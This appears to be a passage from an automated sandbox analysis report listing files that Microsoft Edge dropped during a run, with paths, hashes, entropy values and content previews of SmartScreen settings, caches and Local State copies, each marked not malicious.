Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF362b3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	43978
Entropy (8bit):	6.091563492277619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kXzUXqgfbcztXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynCAt3FqfyW0e6kaoZ
MD5:	B8C44FD62DBA6EA065DDFDB0244439D4
SHA1:	CAE2B3DD4FF540682E3F239E03E869DC88DFB2D6
SHA-256:	27C196BEADAB4E33A47195ECBA5A74D38BD6697759136391A65F22B9293B2C70
SHA-512:	27F6CF5D77C2BDA8953C47A2DD24AE644274F50399E35123704335A1CD6147B181EB89A289F426931F6EED7E08FA0D7532E49B18AEA4599B22CB46A83E8B538D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF44ca5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	43978
Entropy (8bit):	6.091563492277619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kXzUXqgfbcztXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynCAt3FqfyW0e6kaoZ
MD5:	B8C44FD62DBA6EA065DDFDB0244439D4
SHA1:	CAE2B3DD4FF540682E3F239E03E869DC88DFB2D6
SHA-256:	27C196BEADAB4E33A47195ECBA5A74D38BD6697759136391A65F22B9293B2C70
SHA-512:	27F6CF5D77C2BDA8953C47A2DD24AE644274F50399E35123704335A1CD6147B181EB89A289F426931F6EED7E08FA0D7532E49B18AEA4599B22CB46A83E8B538D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4a871.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	43978
Entropy (8bit):	6.091563492277619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kXzUXqgfbcztXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynCAt3FqfyW0e6kaoZ
MD5:	B8C44FD62DBA6EA065DDFDB0244439D4
SHA1:	CAE2B3DD4FF540682E3F239E03E869DC88DFB2D6
SHA-256:	27C196BEADAB4E33A47195ECBA5A74D38BD6697759136391A65F22B9293B2C70
SHA-512:	27F6CF5D77C2BDA8953C47A2DD24AE644274F50399E35123704335A1CD6147B181EB89A289F426931F6EED7E08FA0D7532E49B18AEA4599B22CB46A83E8B538D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.015748290257289
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTIZlUsn:YWLSGTt1o9LuLgfGBPAzkVj/T8lUZlP
MD5:	0EE576893546009153FB4CCD10E81CC2
SHA1:	7571EC603210B6F8A63BBB7ABE9CFBF1CFA15711
SHA-256:	F10F9A6E29D20AC8CE82CBE11D1997E9E56D9A7177DA4F0CD022C9235BA3A8F3
SHA-512:	31A2F13B8BDD1D22A42F6F6B2E173EA623C323460DBB05BE362FBE851417F1E51D7E42BE54718BDEF80240852D12B5CFC94925A15CCF1394E14311775ECBA2CD
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736531769731743}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\eae8f32b-ae17-42e6-a5a5-d96fa88103f4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	43978
Entropy (8bit):	6.091563492277619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kXzUXqgfbcztXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynCAt3FqfyW0e6kaoZ
MD5:	B8C44FD62DBA6EA065DDFDB0244439D4
SHA1:	CAE2B3DD4FF540682E3F239E03E869DC88DFB2D6
SHA-256:	27C196BEADAB4E33A47195ECBA5A74D38BD6697759136391A65F22B9293B2C70
SHA-512:	27F6CF5D77C2BDA8953C47A2DD24AE644274F50399E35123704335A1CD6147B181EB89A289F426931F6EED7E08FA0D7532E49B18AEA4599B22CB46A83E8B538D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\eca7ba11-3291-42bc-b564-ac8deeaa1b3a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44445
Entropy (8bit):	6.097618149798754
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kLTUXqgfbvDDm5pOaZFmUQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynm3DT6qfyW0e6kaoZ
MD5:	5AD0CE277CFBEC305B911505954049BB
SHA1:	0D8CAFB872271E31E4FF32448CF9B410ADA70BA5
SHA-256:	53B3EA215159DA2DFED57355D3DF03AC41068754E3DA2A839FF0EB364858327E
SHA-512:	9699A3F4184E31C1741563B3ED441D5243BDC00115C90ECF34397E997F682A97E4B0A05FCFFE21E20C14444945AE1CD27B81CE4747C176BF06C726220CB4FBA4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTS